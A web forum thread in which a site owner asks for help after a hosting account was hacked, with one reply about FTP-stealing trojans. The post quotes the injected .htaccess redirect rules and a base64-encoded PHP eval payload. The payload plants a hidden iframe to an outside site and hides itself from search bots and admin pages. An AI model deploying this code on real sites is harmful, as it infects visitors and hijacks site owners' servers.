3 {{ upvoteCount | shortNum }}
3 {{ upvoteCount | shortNum }}

My Hosting Account Was Hacked With HTML:Iframe-inf

by Boris_yo
2 replies
I have noticed that when i try to access my websites, it redirects me to strange file called PExxxxxxxx.php. And this happens with all of my domains. I have noticed also that all of my htaccess files have been changed with the following:

Code:
#65FDA983BAA2{
RewriteEngine On
RewriteCond %{REQUEST_METHOD} GET
RewriteCond %{REQUEST_FILENAME} -f
RewriteCond %{REQUEST_FILENAME} !PE(.*).php
RewriteRule (.*)\.(php|html|htm|php3|phtml|shtml)	PE65FDA983BAA2.php?%{QUERY_STRING}&qq=$1.$2 [NC,L]
#65FDA983BAA2}
PExxxxxx.php files have this encrypted code in them:

Code:
<?php

eval(base64_decode('JElJSUlJSUlJSUlJSSA9ICc8ZGl2IHN0eWxlPSJkaXNwbGF5Om5vbmUiPiZuYnNwOyAmbmJzcDs8aWZyYW1lIGZzZHNkZj0ic2RmZGYiIHdpZHRoPSI3MzIiIGhlaWdodD0iNDA1MSIgc3JjPSJodHRwOi8vZ3JpenpsaS1jb3VudGVyLmNvbS9pZDEyMC9pbmRleC5waHAiPjwvaWZyYW1lPjwvZGl2Pic7IGZ1bmN0aW9uIElJSUlJSUlJSUlJSSgkSUlJSUlJSUlJSUlsKSB7IGdsb2JhbCAkYXJndjsgJElJSUlJSUlJSUlsSSA9IGRpcm5hbWUoZ2V0Y3dkKCkgLiAnLycgLiAkSUlJSUlJSUlJSUlsKTsgJElJSUlJSUlJSUlsbCA9IGdldGN3ZCgpOyBAY2hkaXIoJElJSUlJSUlJSUlsSSk7ICRJSUlJSUlJSUlJbEkgPSBnZXRjd2QoKTsgQGNoZGlyKCRJSUlJSUlJSUlJbGwpOyByZXR1cm4gJElJSUlJSUlJSUlsSTsgfSBmdW5jdGlvbiBJSUlJSUlJSUlJSWwoJElJSUlJSUlJSUlsMSkgeyBpZiggc3Ryc3RyKCRJSUlJSUlJSUlJbDEsICJZYW5kZXgvIikgIT0gbnVsbCB8fCBzdHJzdHIoJElJSUlJSUlJSUlsMSwgIllhRGlyZWN0Qm90IikgIT0gbnVsbCB8fCBzdHJzdHIoJElJSUlJSUlJSUlsMSwgIkphbWVzIEJvbmQiKSAhPSBudWxsIHx8IHN0cnN0cigkSUlJSUlJSUlJSWwxLCAiR29vZ2xlYm90IikgIT0gbnVsbCB8fCBzdHJzdHIoJElJSUlJSUlJSUlsMSwgIk1lZGlhcGFydG5lcnMtR29vZ2xlIikgIT0gbnVsbCB8fCBzdHJzdHIoJElJSUlJSUlJSUlsMSwgIlN0YWNrUmFtYmxlciIpICE9IG51bGwgfHwgc3Ryc3RyKCRJSUlJSUlJSUlJbDEsICJTbHVycCIpICE9IG51bGwgfHwgc3Ryc3RyKCRJSUlJSUlJSUlJbDEsICJtc25ib3QiKSAhPSBudWxsICkgeyByZXR1cm4gdHJ1ZTsgfSByZXR1cm4gZmFsc2U7IH0gZnVuY3Rpb24gSUlJSUlJSUlJSUkxKCRJSUlJSUlJSUlJbEkpIHsgJElJSUlJSUlJSUkxSSA9IGFycmF5KCdhZG0nLCAncG1hJywgJ21vZGVyJywgJ2NwJyk7ICRJSUlJSUlJSUlJMWwgPSBmYWxzZTsgZm9yZWFjaCAoJElJSUlJSUlJSUkxSSBhcyAkSUlJSUlJSUlJSTExKSB7IGlmKHN0cnN0cigkSUlJSUlJSUlJSWxJLCAkSUlJSUlJSUlJSTExKSAhPSBudWxsKSB7ICRJSUlJSUlJSUlJMWwgPSB0cnVlOyB9IH0gcmV0dXJuICRJSUlJSUlJSUlJMWw7IH0gZnVuY3Rpb24gSUlJSUlJSUlJSWxJKCRJSUlJSUlJSUlsSUkpIHsgZ2xvYmFsICRJSUlJSUlJSUlJSUksICRfU0VSVkVSOyAkSUlJSUlJSUlJbElJID0gcHJlZ19yZXBsYWNlKCcvPGlmcmFtZS4qc3R5bGU9LipoaWRkZW4uKlwvaWZyYW1lW14+XSo+L2knLCAiIiwgJElJSUlJSUlJSWxJSSk7ICRJSUlJSUlJSUlsSUkgPSBwcmVnX3JlcGxhY2UoJy88ZGl2LipzdHlsZT0uKmRpc3BsYXk6bm9uZS4qW14+XSo+Lio8aWZyYW1lIC4qXC8uKmRpdltePl0qPi9pJywgIiIsICRJSUlJSUlJSUlsSUkpOyAkSUlJSUlJSUlJbElJID0gcHJlZ19yZXBsYWNlKCcvPCEtLSBhZCAtLT48c2NyaXB0W14+XSo+Lio8XC9zY3JpcHQ+PCEtLSBcL2FkIC0tPi9pJywgIiIsICRJSUlJSUlJSUlsSUkpOyBpZihJSUlJSUlJSUlJSWwoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddKSA9PSB0cnVlIHx8IElJSUlJSUlJSUlJMShkaXJuYW1lKCRfU0VSVkVSWydTQ1JJUFRfTkFNRSddKSkgPT0gdHJ1ZSkgeyByZXR1cm4gJElJSUlJSUlJSWxJSTsgfSBlbHNlIHsgaWYocHJlZ19tYXRjaCgiLyg8Ym9keVtePl0qPikvaSIsICRJSUlJSUlJSUlsSUkpID4gMCkgeyByZXR1cm4gcHJlZ19yZXBsYWNlKCIvKDxib2R5W14+XSo+KS9pIiwgIiRJSUlJSUlJSUlsSTEgXG4iLiRJSUlJSUlJSUlJSUksICRJSUlJSUlJSUlsSUksIDEpOyB9IGVsc2UgeyByZXR1cm4gJElJSUlJSUlJSWxJSS4kSUlJSUlJSUlJSUlJOyB9IH0gfSBpZihAb2Jfc3RhcnQoJ0lJSUlJSUlJSUlsSScpID09IHRydWUpIHsgJElJSUlJSUlJSUlJbCA9ICRfR0VUWydxcSddOyBAY2hkaXIoSUlJSUlJSUlJSUlJKCRJSUlJSUlJSUlJSWwpKTsgaW5jbHVkZSgkSUlJSUlJSUlJSUlsKTsgfSBlbHNlIHsgZWNobyAkSUlJSUlJSUlJSUlJOyB9'));

?>
What should i do? How to clean my account from virus?

Thanks.
#account #hacked #hosting #htmliframeinf
  • Profile picture of the author dvduval
    Also, scan your personal computer for trojans. I know it sounds unlikely, but this is a very common access point these days. Trojans search for ftp logins and phone home.
    Signature
    It is okay to contact me! I have been developing software since 1999, creating many popular products like phpLD.
    {{ DiscussionBoard.errors[1583240].message }}

Trending Topics